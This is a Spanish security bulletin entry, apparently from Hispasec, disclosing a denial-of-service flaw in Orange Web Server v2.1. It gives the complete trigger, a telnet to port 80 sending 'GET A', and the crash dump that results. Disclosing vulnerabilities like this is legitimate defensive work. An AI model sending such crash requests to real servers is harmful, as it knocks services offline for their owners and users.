Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Estás aquí: Inicio / Vulnerabilidades / Vulnerabilidad en Orange Web Server v2.1

Vulnerabilidad en Orange Web Server v2.1

Por Deja un comentario

Orange Web Server v2.1 se ve afectado por una vulnerabilidad que
posibilita a un usuario malicioso la realización de un ataque de
denegación de servicios.
Este servidor web perteneciente a GoAhead Technology y que corre sobre
todas las plataformas Microsoft Windows, facilita el convertir nuestro
ordenador en un potente servidor web.

La denegación de servicio que afecta a Orange Web Server v2.1 es
sorprendente por la facilidad de su explotación. Un atacante tan sólo
tendría que hacer un Telnet al puerto 80 de la dirección objeto de su
investigación y realizar una petición tipo GET A, con esta simple
petición podrá conseguir la caída del servidor. Dando como resultado un
volcado del tipo:

Petición:

telnet 192.168.0.20 80
GET A

Volcado:

ORANGEWEBSERVER caused an invalid page fault
in module ORANGEWEBSERVER.EXE at
016f:00409694.
Registers:
EAX=49703d50 CS=016f EIP=00409694
EFLGS=00010246 EBX=009dfe84 SS=0177
ESP=009dfbb8 EBP=009dfe8c ECX=00000000
DS=0177 ESI=00416362 FS=84cf EDX=00000000
ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
f7 71 04 5e 8b c2 c3 90 90 90 90 90 56 8b 74 24
Stack dump:
00416350 004094a7 00000000 00416350 ffffffff
009dfbf0 009dfe8c 009dfe84 00418644 ffffffff
006d8e8c 00410b62 00000000 00416350 006d949c
00000000

Antonio Román Arrebola
antonio_roman@hispasec.com

Más información:

Orange Web Server v2.1 DoS:
http://www.securityfocus.com/archive/1/165658

Interacciones del lector

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.